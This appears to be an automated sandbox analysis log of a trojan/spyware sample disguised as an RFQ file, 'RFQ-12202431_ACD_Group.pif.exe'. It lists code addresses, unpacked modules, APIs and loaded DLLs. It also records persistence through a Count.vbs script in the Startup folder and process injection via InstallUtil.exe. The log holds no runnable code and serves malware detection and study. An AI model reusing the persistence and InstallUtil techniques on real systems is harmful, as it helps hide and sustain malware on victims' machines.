Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA1D28	2_2_00FA1D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2158	2_2_00FA2158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2148	2_2_00FA2148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA433A	2_2_00FA433A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA27DE	2_2_00FA27DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA27C1	2_2_00FA27C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA27A7	2_2_00FA27A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2793	2_2_00FA2793
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2779	2_2_00FA2779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2766	2_2_00FA2766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2720	2_2_00FA2720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2720	2_2_00FA2720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2829	2_2_00FA2829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA2803	2_2_00FA2803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA4D58	2_2_00FA4D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA1D28	2_2_00FA1D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA1D18	2_2_00FA1D18
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00F128B8	4_2_00F128B8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00F12897	4_2_00F12897
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00F12E39	4_2_00F12E39
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0588DCB0	4_2_0588DCB0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0588EB78	4_2_0588EB78
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06607476	4_2_06607476
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06608DDB	4_2_06608DDB
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066050A8	4_2_066050A8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066016E9	4_2_066016E9
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066016F8	4_2_066016F8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0660D390	4_2_0660D390
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06605098	4_2_06605098
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E4620	4_2_066E4620
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E0040	4_2_066E0040
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E7F90	4_2_066E7F90
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E0006	4_2_066E0006
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E10E0	4_2_066E10E0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E10F0	4_2_066E10F0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E5C28	4_2_066E5C28
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E4947	4_2_066E4947
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F7350	4_2_066F7350
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F7340	4_2_066F7340
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F7841	4_2_066F7841
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F0040	4_2_066F0040
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F0027	4_2_066F0027
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F60A0	4_2_066F60A0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F6090	4_2_066F6090
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06824298	4_2_06824298
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_068242A8	4_2_068242A8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06824754	4_2_06824754
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06849F28	4_2_06849F28
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684EED1	4_2_0684EED1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06844558	4_2_06844558
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684C3A0	4_2_0684C3A0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684C3B0	4_2_0684C3B0
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684E3EA	4_2_0684E3EA
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684C350	4_2_0684C350
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06B1EEC8	4_2_06B1EEC8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06B00006	4_2_06B00006
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06B00040	4_2_06B00040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_010223D1	5_2_010223D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01021D28	5_2_01021D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01022148	5_2_01022148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01022158	5_2_01022158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_010223D1	5_2_010223D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01021D18	5_2_01021D18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01024D2F	5_2_01024D2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01021D28	5_2_01021D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_01024D58	5_2_01024D58

Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390290705646.000000000104E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.00000000049C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000000.390159189811.0000000000B92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepdp.exe( vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390310066527.00000000069E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameZlqgy.dll" vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.00000000031C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOrkexnhsfu.exe" vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390312248341.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ-12202431_ACD_Group.pif.exe
Source: RFQ-12202431_ACD_Group.pif.exe	Binary or memory string: OriginalFilenamepdp.exe( vs RFQ-12202431_ACD_Group.pif.exe

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, YivfexVWZI1iWQ36XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, YivfexVWZI1iWQ36XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, Oou6f20t2x6LiBYUPV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/4@2/2

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs"

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: RFQ-12202431_ACD_Group.pif.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ-12202431_ACD_Group.pif.exe	ReversingLabs: Detection: 26%
Source: RFQ-12202431_ACD_Group.pif.exe	Virustotal: Detection: 29%

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File read: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe "C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe"
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Count.exe "C:\Users\user\AppData\Roaming\Count.exe"
Source: C:\Users\user\AppData\Roaming\Count.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Count.exe "C:\Users\user\AppData\Roaming\Count.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
